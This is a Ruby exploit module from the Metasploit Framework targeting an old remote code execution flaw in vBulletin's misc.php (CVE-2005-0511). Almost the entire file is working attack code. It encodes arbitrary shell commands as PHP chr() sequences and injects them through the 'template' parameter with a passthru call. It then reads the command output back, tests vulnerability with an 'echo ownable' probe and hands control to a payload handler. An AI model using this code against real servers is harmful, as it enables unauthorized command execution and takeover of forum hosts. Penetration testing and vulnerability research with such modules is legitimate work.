# $Id: php_vbulletin_template.rb 9929 2010-07-25 21:37:54Z jduck $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    # XXX This module needs an overhaul
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'vBulletin misc.php Template Name Arbitrary Code Execution',
            'Description'    => %q{
                    This module exploits an arbitrary PHP code execution flaw in
                the vBulletin web forum software. This vulnerability is only
                present when the "Add Template Name in HTML Comments" option
                is enabled. All versions of vBulletin prior to 3.0.7 are
                affected.
            },
            'Author'         =>
                [
                    'str0ke <str0ke[at]milw0rm.com>',
                    'cazz'
                ],
            'License'        => BSD_LICENSE,
            'Version'        => '$Revision: 9929 $',
            'References'     =>
                [
                    [ 'CVE', '2005-0511' ],
                    [ 'BID', '12622' ],
                    [ 'OSVDB', '14047' ],
                ],
            'Privileged'     => false,
            'Platform'       => ['unix', 'solaris'],
            'Payload'        =>
                {
                    'Space'       => 512,
                    'DisableNops' => true,
                    'Keys'        => ['cmd', 'cmd_bash'],
                },
            'Targets'        => [ ['Automatic', { }], ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Feb 25 2005'
            ))
 
        register_options(
            [
                OptString.new('PATH', [ true,  "Path to misc.php", '/forum/misc.php']),
            ], self.class)
 
        deregister_options(
            'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
        )
    end
 
    def go(command)
        wrapper = rand_text_alphanumeric(rand(128)+32)
 
        command = "echo #{wrapper};#{command};echo #{wrapper};"
        encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
 
        res = send_request_cgi({
                'uri'      => datastore['PATH'],
                'method'   => 'GET',
                'vars_get' =>
                    {
                        'do' => "page",
                        'template' => "{${passthru(#{encoded})}}"
                    }
            }, 5)
 
        if (res and res.body)
            b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
            if b
                return b.captures[0]
            elsif datastore['HTTP::chunked'] == true
                b = /chunked Transfer-Encoding forbidden/.match(res.body)
                if b
                    raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
                end
            end
        end
 
        return nil
    end
 
    def check
        response = go("echo ownable")
        if (!response.nil? and response =~ /ownable/sm)
            return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
    end
 
    def exploit
        response = go(payload.encoded)
        if response == nil
            print_error('exploit failed: no response')
        else
            if response.length == 0
                print_status('exploit successful')
            else
                print_status("Command returned #{response}")
            end
            handler
        end
    end
end